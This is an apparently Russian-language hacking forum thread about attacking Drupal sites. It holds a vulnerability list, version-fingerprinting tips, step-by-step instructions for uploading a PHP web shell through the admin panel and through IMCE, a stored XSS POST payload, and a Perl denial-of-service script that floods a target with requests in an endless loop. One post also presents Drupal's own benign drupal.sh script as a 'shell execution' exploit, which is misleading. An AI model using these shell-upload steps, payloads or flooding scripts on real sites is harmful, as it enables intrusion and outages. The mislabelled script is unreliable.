Обзор уязвимостей Drupal Drupal < 4.7.6 (post comments) Remote Command Execution Exploit v2 Drupal < 5.1 (post comments) Remote Command Execution Exploit v2 Drupal Cross-Site Request Forgery Vulnerability (Vulnerabilities) Drupal Prior To 4.7.11 and 5.6 Multiple Remote Vulnerabilities (Vulnerabilities) Drupal Prior To 4.7.8 and 5.3 Multiple Remote Vulnerabilities (Vulnerabilities) Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector Drupal Content Construction Kit Nodereference Module Multiple HTML-injection Vulnerabilities (Vulnerabilities) [Injection] Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities) Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)
отсортировано по убыванию по дате =================== HIGH Drupal Meta Tags Module command execution Обход ограничений безопасности в Drupal Удаленный пользователь может изменить данные профиля других пользователей. Drupal Site_Documentation_Module CVE-2008-2271 Drupal Comment Upload Module =================== SQL-inj SQL-инъекция в Drupal SQL-инъекция в vbDrupal SQL-инъекция в Drupal Acidfree Module SQL-инъекция в Drupal Extended Tracker SQL-инъекция в Drupal Easylinks SQL-инъекция в Drupal Bibliography SQL-инъекция в Drupal Jobsearch SQL-инъекция и раскрытии е данных в Drupal =================== Multy Множественные уязвимости в vbDrupal Множественные уязвимости в Drupal Множественные уязвимости в Drupal Множественные уязвимости в Drupal Множественные уязвимости в Drupal Несколько уязвимостей в Drupal Несколько уязвимостей в Drupal Help Tip Несколько уязвимостей в Drupal IMCE =================== CSRF CSRF атака в Drupal Userpoints Module CSRF атака в Drupal BUEditor Module =================== XSS XSS Drupal Internationalization and Localizer XSS Drupal E-Publish Module XSS Drupal Ubercart Module XSS Drupal Webform Module XSS Drupal Flickr Module XSS Multiple Time Sheets XSS Drupal XSS Drupal Workflow Module XSS Drupal Archive Module XSS Drupal Shoutbox Module XSS Drupal Token XSS Drupal Web Links XSS Drupal Project Issue Tracking Module XSS Drupal XSS Drupal LoginToboggan Module XSS Drupal Project Module XSS Drupal MySite Module XSS Drupal Site Profile Directory XSS Drupal Search Keywords XSS Drupal Pathauto XSS Drupal E-commerce XSS Drupal Easylinks XSS Drupal Bibliography XSS Drupal Recipe Module XSS Drupal XSS Drupal webform Module XSS Drupal XSS Drupal =================== Module Drupal Simple Access Module Drupal Header Image Module Уязвимость позволяеть получить доступ к административной части приложения. Drupal Secure Site Module Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя. Drupal OpenID Module Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку. Drupal Forward Module Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении. Drupal Print Module Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям. Drupal Project Issue Tracking Module Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные. Drupal Nodefamily Module Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL. Drupal Textimage Module Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе. Drupal Captcha Module Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha. Drupal Pubcookie Module Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации. Drupal Form_mail Module Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение.
вот так версию узнать можно: Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка: define('VERSION', 'ТУТ ВЕРСИЯ'); Если строчки нет, то версия ниже 4.7.0 Дополню пост: в некоторых модулях написана версия, к примеру: site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё. З.Ы. почему бы не прикрепить тему, тоже нужная вещь
Drupal 6.14 - заливка шелла из админпанели 1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration 2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных 3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published) 4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt) 5) http://drupal.ru/sites/default/files/shell.php3 - шелл 6) Administer->Content management->Удаляем страницу
мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка Code: # $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
ещё один способ загрузки шела ещё один способ загрузки шела: Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп
Drupal 7.0 Shell Execution Script PHP: #!/usr/bin/env php <?php /** * Drupal 7.0 Shell Execution Script * ================ * By KedAns-Dz <[email protected]> * ================ * (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh * The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts * ================ * ------------------------ * Check for your PHP interpreter - on Windows you'll probably have to * replace line 1 with : * #!c:/program files/php/php.exe * @param path Drupal's absolute root directory in local file system (optional). * @param URI A URI to execute, including HTTP protocol prefix. */ $script = basename(array_shift($_SERVER['argv'])); if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) { echo <<<EOF Execute a Drupal page from the shell. Usage: {$script} [OPTIONS] "<URI>" Example: {$script} "http://target.org/node" All arguments are long options. --help This page. --root Set the working directory for the script to the specified path. To execute Drupal this has to be the root directory of your Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal running on Unix). Current directory is not required. Use surrounding quotation marks on Windows. --verbose This option displays the options as they are set, but will produce errors from setting the session. URI The URI to execute, i.e. http://default/foo/bar for executing the path '/foo/bar' in your site 'default'. URI has to be enclosed by quotation marks if there are ampersands in it (f.e. index.php?q=node&foo=bar). Prefix 'http://' is required, and the domain must exist in Drupal's sites-directory. If the given path and file exists it will be executed directly, i.e. if URI is set to http://default/bar/foo.php and bar/foo.php exists, this script will be executed without bootstrapping Drupal. To execute Drupal's cron.php, specify http://default/cron.php as the URI. To run this script without --root argument invoke it from the root directory of your Drupal installation with ./scripts/{$script} n EOF; exit; } // define default settings $cmd = 'index.php'; $_SERVER['HTTP_HOST'] = 'default'; $_SERVER['PHP_SELF'] = '/index.php'; $_SERVER['REMOTE_ADDR'] = '127.0.0.1'; $_SERVER['SERVER_SOFTWARE'] = NULL; $_SERVER['REQUEST_METHOD'] = 'GET'; $_SERVER['QUERY_STRING'] = ''; $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = '/'; $_SERVER['HTTP_USER_AGENT'] = 'console'; // toggle verbose mode if (in_array('--verbose', $_SERVER['argv'])) { $_verbose_mode = true; } else { $_verbose_mode = false; } // parse invocation arguments while ($param = array_shift($_SERVER['argv'])) { switch ($param) { case '--root': // change working directory $path = array_shift($_SERVER['argv']); if (is_dir($path)) { chdir($path); if ($_verbose_mode) { echo "cwd changed to: {$path}n"; } } else { echo "nERROR: {$path} not found.nn"; } break; default: if (substr($param, 0, 2) == '--') { // ignore unknown options break; } else { // parse the URI $path = parse_url($param); // set site name if (isset($path['host'])) { $_SERVER['HTTP_HOST'] = $path['host']; } // set query string if (isset($path['query'])) { $_SERVER['QUERY_STRING'] = $path['query']; parse_str($path['query'], $_GET); $_REQUEST = $_GET; } // set file to execute or Drupal path (clean urls enabled) if (isset($path['path']) && file_exists(substr($path['path'], 1))) { $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $path['path']; $cmd = substr($path['path'], 1); } elseif (isset($path['path'])) { if (!isset($_GET['q'])) { $_REQUEST['q'] = $_GET['q'] = $path['path']; } } // display setup in verbose mode if ($_verbose_mode) { echo "Hostname set to: {$_SERVER['HTTP_HOST']}n"; echo "Script name set to: {$cmd}n"; echo "Path set to: {$_GET['q']}n"; } } break; } } if (file_exists($cmd)) { include $cmd; } else { echo "nERROR: {$cmd} not found.nn"; } exit(); /***============================================================================================ ***================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== * Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > * Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz * Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz * Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com) * Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ * Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX * Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , * 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com * www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... *================================================================================================ */ 4символа
Drupal 5.x, возможно более ранние версии. Уязвим параметр profile_big, field_location[0][city]. POST: Code: www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=<script>alert('XSS by mr.Penguin')</script>&op=Сохранить Далее нажмите на "Просмотр" и активная XSS выполнится Скриншоты:
Drupal 0-day Отказ в обслуживании PHP: 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Angel Injection member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] title: Drupal 0-day Denial Of Service [-] author: Angel Injection [-] Security -::RISK: high ---------perl code---------------- #!/usr/bin/perl use Socket; if (@ARGV < 2) { &usage } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; for ($i=0; $i<10; $i--) { $user="Drupal".$rand.$i; $data = "s=" ; $len = length $data; $foo = "POST ".$dir."index.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+" ; } print "\n\n"; system('ping $host'); sub usage { print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /Drupal/\n"; print "\tex2: $0 127.0.0.1 /\n\n"; exit(); }; # 1337day.com [2012-05-05] Линк: 1337day.com/exploits/18201
А как работать с этим скриптом и какой принцип его действия? Будьте так добры, поясните, пожалуйста. Интерпретатор стоит, запуск из командной строки, так? В нем что-то нужно дописывать?
http://forum.antichat.ru/showpost.php?p=3020365&postcount=8 не понял, что он делает? как работает? и ещё не запускается Code: #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php #!/usr/bin/php PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 19456 bytes) in /tmp/index.php on line 80 и попутный вопрос, нет ни чего на 6.22?
Что в бд drupal 6,28 отвечает за ретрив пароля? Пишется там куда-нибудь хеш или как? Движок пока скачать не могу(